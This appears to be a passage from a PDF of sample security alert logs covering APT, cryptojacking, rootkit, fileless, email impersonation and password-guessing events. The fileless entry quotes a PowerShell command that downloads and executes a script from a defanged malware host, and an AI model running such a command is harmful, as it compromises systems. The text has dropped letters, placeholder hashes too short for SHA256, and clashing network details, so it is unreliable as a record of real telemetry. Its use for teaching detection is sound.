- File Access Time: 2023-03-14 10:30:14
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 1234
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Crea on Time: 2023-03-14 10:30:14
- Process Modifica on Time: 2023-03-14 10:30:14
- Process Access Time: 2023-03-14 10:30:14
- User Domain: contoso.com

14
- User Logon ID: (0x0,0x3E7)
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connec on: 192.168.1.100:1234 -> 192.168.1.200:445
- Network Protocol: TCP
- Network Bytes Sent: 1234
- Network Bytes Received: 5678
- Network Timestamp: 2023-03-14 10:30:15
- Network Dura on: 00:00:01
- Network Bandwidth: 18 KB/s
- Network Packet Count: 10
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED
- Network Direc on: OUTBOUND
- Network Ini ated By: Applica on
- Network Applica on: C:\Windows\System32\svchost.exe
- Network Port: 1234
- Network Des na on IP: 192.168.1.200
- Network Des na on Port: 445
- Network Des na on Zone: Internal
- Network Des na on Country: United States
- Network Des na on City: Redmond
- Network Des na on Organiza on: Microso Corpora on
- Network Des na on Domain: microso .com
- Network Des na on URL: N/A
- Network Des na on File: N/A
- Network Des na on Hash: N/A
- Network Des na on Reputa on: Unknown
- Network Des na on Threat: Unknown
- Network Des na on Malware: Unknown
- Network Des na on Phishing: Unknown
- Network Des na on Spam: Unknown

15
- Network Des na on Scam: Unknown
- Network Des na on Category: N/A

APT A ack:
Event Time: 2023-03-14 14:45:00
Device Name: WIN-1234567890
User Name: john.doe
Event Category: APT
Event Level: High
Source: Trend Micro Apex One

Descrip on:
Trend Micro Apex One detected and blocked an APT a ack on device WIN-1234567890, which was
ini ated by user john.doe. The APT group associated with this a ack was iden fied as "Threat
Actor X".

Addi onal Details:


- File Name: C:\Windows\Temp\net.exe
- File Path: C:\Windows\Temp\
- File Size: 234567 bytes
- File SHA256 Hash: 9876543210abcdef9876543210abcdef
- File MD5 Hash: 8765432190abcdef8765432190abcdef
- File Crea on Time: 2023-03-14 14:44:45
- File Modifica on Time: 2023-03-14 14:44:45
- File Access Time: 2023-03-14 14:44:45
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 4321
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Crea on Time: 2023-03-14 14:44:45
- Process Modifica on Time: 2023-03-14 14:44:45
- Process Access Time: 2023-03-14 14:44:45
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)

16
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connec on: 192.168.1.100:1234 -> 192.168.1.200:445
- Network Protocol: TCP
- Network Bytes Sent: 2345
- Network Bytes Received: 6789
- Network Timestamp: 2023-03-14 14:44:45
- Network Dura on: 00:00:01
- Network Bandwidth: 30 KB/s
- Network Packet Count: 15
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED
- Network Direc on: OUTBOUND
- Network Ini ated By: Applica on
- Network Applica on: C:\Windows\System32\svchost.exe
- Network Port: 1234
- Network Des na on IP: 192.168.1.200
- Network Des na on Port: 445
- Network Des na on Zone: Internal
- Network Des na on Country: United States
- Network Des na on City: Redmond
- Network Des na on Organiza on: Microso Corpora on
- Network Des na on Domain: microso .com
- Network Des na on URL: N/A
- Network Des na on File: N/A
- Network Des na on Hash: N/A
- Network Des na on Reputa on: Unknown
- Network Des na on Threat: Unknown
- Network Des na on Malware: Unknown
- Network Des na on Phishing: Unknown
- Network Des na on Spam: Unknown
- Network Des na on Scam: Unknown

17
- Network Des na on Category: N/A
- APT Group: Threat Actor X
- APT Campaign: Opera on Red

Crypto jacking A ack:


Event Time: 2023-03-15 10:15:00
Device Name: WIN-1234567890
User Name: jane.doe
Event Category: Cryptojacking
Event Level: High
Source: Trend Micro Apex One

Descrip on:
Trend Micro Apex One detected and blocked a cryptojacking a ack on device WIN-1234567890,
which was ini ated by user jane.doe. The cryptojacking malware was iden fied as "CoinMiner".

Addi onal Details:


- File Name: C:\Users\jane.doe\AppData\Local\Temp\miner.exe
- File Path: C:\Users\jane.doe\AppData\Local\Temp\
- File Size: 56789 bytes
- File SHA256 Hash: 3456789012abcdef3456789012abcdef
- File MD5 Hash: 2345678901abcdef2345678901abcdef
- File Crea on Time: 2023-03-15 10:14:55
- File Modifica on Time: 2023-03-15 10:14:55
- File Access Time: 2023-03-15 10:14:55
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 5678
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Crea on Time: 2023-03-15 10:14:55
- Process Modifica on Time: 2023-03-15 10:14:55
- Process Access Time: 2023-03-15 10:14:55
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)

18
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connec on: 192.168.1.100:1234 -> 192.168.1.200:3333
- Network Protocol: TCP
- Network Bytes Sent: 1234
- Network Bytes Received: 5678
- Network Timestamp: 2023-03-15 10:14:55
- Network Dura on: 00:00:01
- Network Bandwidth: 20 KB/s
- Network Packet Count: 10
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED
- Network Direc on: OUTBOUND
- Network Ini ated By: Applica on
- Network Applica on: C:\Windows\System32\svchost.exe
- Network Port: 3333
- Network Des na on IP: 192.168.1.200
- Network Des na on Port: 3333
- Network Des na on Zone: Internal
- Network Des na on Country: United States
- Network Des na on City: Redmond
- Network Des na on Organiza on: Microso Corpora on
- Network Des na on Domain: microso .com
- Network Des na on URL: pool.miner.com:3333
- Network Des na on File: N/A
- Network Des na on Hash: N/A
- Network Des na on Reputa on: Malicious
- Network Des na on Threat: Cryptojacking
- Network Des na on Malware: CoinMiner
- Network Des na on Phishing: Unknown
- Network Des na on Spam: Unknown
- Network Des na on Scam: Unknown

19
- Network Des na on Category: Malicious
- Cryptojacking Algorithm: SHA-256
- Cryptojacking Currency: Bitcoin
- Cryptojacking Pool: pool.miner.com:3333
- Cryptojacking Wallet: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa

Rootkits:
Event Time: 2023-03-16 12:30:00
Device Name: WIN-1234567890
User Name: admin
Event Category: Rootkit
Event Level: Cri cal
Source: Trend Micro Apex One

Descrip on:
Trend Micro Apex One detected and blocked a rootkit a ack on device WIN-1234567890, which
was ini ated by user admin. The rootkit malware was iden fied as "ZeroAccess".

Addi onal Details:


- File Name: C:\Windows\System32\drivers\mrxsmb.sys
- File Path: C:\Windows\System32\drivers\
- File Size: 234567 bytes
- File SHA256 Hash: 1234567890abcdef1234567890abcdef
- File MD5 Hash: 9876543210abcdef9876543210abcdef
- File Crea on Time: 2023-03-16 12:29:55
- File Modifica on Time: 2023-03-16 12:29:55
- File Access Time: 2023-03-16 12:29:55
- Process Name: C:\Windows\System32\svchost.exe
- Process ID: 1234
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Process Crea on Time: 2023-03-16 12:29:55
- Process Modifica on Time: 2023-03-16 12:29:55

20
- Process Access Time: 2023-03-16 12:29:55
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- System Call: NtCreateFile
- System Call Result: 0xC0000022 (STATUS_ACCESS_DENIED)
- System Call Timestamp: 2023-03-16 12:29:55
- System Call Process ID: 1234
- System Call Thread ID: 4567
- Rootkit Behavior: Hooking system calls to hide malicious ac vity
- Rootkit Technique: Direct Kernel Object Manipula on (DKOM)
- Rootkit Component: Driver
- Rootkit Family: ZeroAccess
- Rootkit Category: Rootkit
- Rootkit Severity: High
- Rootkit Confidence: 90
- Rootkit Recommenda on: Quaran ne and remove the malicious driver

Fileless A ack:
Event Time: 2023-03-17 14:45:00
Device Name: WIN-1234567890
User Name: john.doe
Event Category: Fileless
Event Level: High
Source: Trend Micro Apex One

Descrip on:
Trend Micro Apex One detected and blocked a fileless a ack on device WIN-1234567890, which
was ini ated by user john.doe. The a ack used PowerShell to download and execute a malicious
script.

Addi onal Details:


- A ack Type: Fileless

21
- A ack Technique: PowerShell Script
- A ack Vector: Download and execute
- A ack Payload: Malicious PowerShell script
- A ack Source: hxxp://malware[.]com/powershell.ps1
- A ack Des na on: C:\Windows\Temp\
- A ack File Name: powershell.ps1
- A ack File Size: 12345 bytes
- A ack File SHA256 Hash: 1234567890abcdef1234567890abcdef
- A ack File MD5 Hash: 9876543210abcdef9876543210abcdef
- A ack File Crea on Time: 2023-03-17 14:44:55
- A ack File Modifica on Time: 2023-03-17 14:44:55
- A ack File Access Time: 2023-03-17 14:44:55
- Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- Process ID: 5678
- Process Command Line: powershell.exe -noprofile -command "IEX (New-Object
Net.WebClient).DownloadString('hxxp://malware[.]com/powershell.ps1')"
- Process Crea on Time: 2023-03-17 14:44:55
- Process Modifica on Time: 2023-03-17 14:44:55
- Process Access Time: 2023-03-17 14:44:55
- User Domain: contoso.com
- User Logon ID: (0x0,0x3E7)
- User SID: S-1-5-21-1234567890-1234567890-1234567890-1234
- Network Connec on: 192.168.1.100:1234 -> hxxp://malware[.]com:80
- Network Protocol: HTTP
- Network Bytes Sent: 1234
- Network Bytes Received: 5678
- Network Timestamp: 2023-03-17 14:44:55
- Network Dura on: 00:00:01
- Network Bandwidth: 20 KB/s
- Network Packet Count: 10
- Network Payload: 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ...
- Network Flags: SYN, ACK
- Network State: ESTABLISHED

22
- Network Direc on: OUTBOUND
- Network Ini ated By: Applica on
- Network Applica on: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- Network Port: 80
- Network Des na on IP: hxxp://malware[.]com
- Network Des na on Port: 80
- Network Des na on Zone: Internet
- Network Des na on Country: United States
- Network Des na on City: Redmond
- Network Des na on Organiza on: Microso Corpora on
- Network Des na on Domain: microso .com
- Network Des na on URL: hxxp://malware[.]com/powershell.ps1

Impersona on a ack:
Event Time: 2023-03-18 10:15:00
Event Category: Impersona on
Event Level: High
Source: Trend Micro Email Security

Descrip on:
Trend Micro Email Security detected and blocked an impersona on a ack on email account
[email protected]. The a ack used a spoofed sender email address to impersonate the CEO
of Contoso, Inc.

Addi onal Details:


- A ack Type: Impersona on
- A ack Technique: Email Spoofing
- A ack Vector: Social Engineering
- A ack Payload: Malicious email with phishing link
- A ack Source: hxxp://phishing[.]com
- A ack Des na on: [email protected]
- A ack Sender: [email protected] (spoofed)
- A ack Sender IP: 192.168.1.100

23
- A ack Sender Domain: contoso.com (spoofed)
- A ack Subject: Urgent: Update Your Account Informa on
- A ack Body: Please click on the link below to update your account informa on:
hxxp://phishing[.]com/update
- A ack A achment: None
- A ack Header Analysis:
- From: [email protected] (spoofed)
- Reply-To: [email protected]
- Return-Path: [email protected]
- Message-ID: <[email protected]>
- Authen ca on-Results: none
- A ack Reputa on:
- Sender IP Reputa on: 80 (High Risk)
- Sender Domain Reputa on: 90 (Very High Risk)
- URL Reputa on: 95 (Extremely High Risk)
- A ack Classifica on:
- Category: Impersona on
- Subcategory: Email Spoofing
- Confidence: 95
- Ac on Taken: Blocked and quaran ned the email
- User Ac on: None required

24
Dic onary Traversal:
Event Time: 2023-03-19 14:30:00
Event Category: Dic onary Traversal
Event Level: High
Source: Trend Micro Email Security

Descrip on:
Trend Micro Email Security detected and blocked a dic onary traversal a ack on email account
[email protected]. The a ack used a series of common passwords to a empt to gain
unauthorized access to the email account.

Addi onal Details:


- A ack Type: Dic onary Traversal
- A ack Technique: Brute Force
- A ack Vector: Creden al Stuffing
- A ack Payload: None
- A ack Source: 192.168.1.100
- A ack Des na on: smtp.office365.com
- A ack Sender: [email protected]
- A ack Sender IP: 192.168.1.100
- A ack Authen ca on: Anonymous
- A ack Password A empts:
- Password A empt 1: password1
- Password A empt 2: password2
- Password A empt 3: password3
- Password A empt 4: password4
- Password A empt 5: password5
- A ack Classifica on:
- Category: Brute Force
- Subcategory: Dic onary Traversal
- Confidence: 95
- Ac on Taken: Blocked and logged the IP address
- User Ac on: None required

25
26

You might also like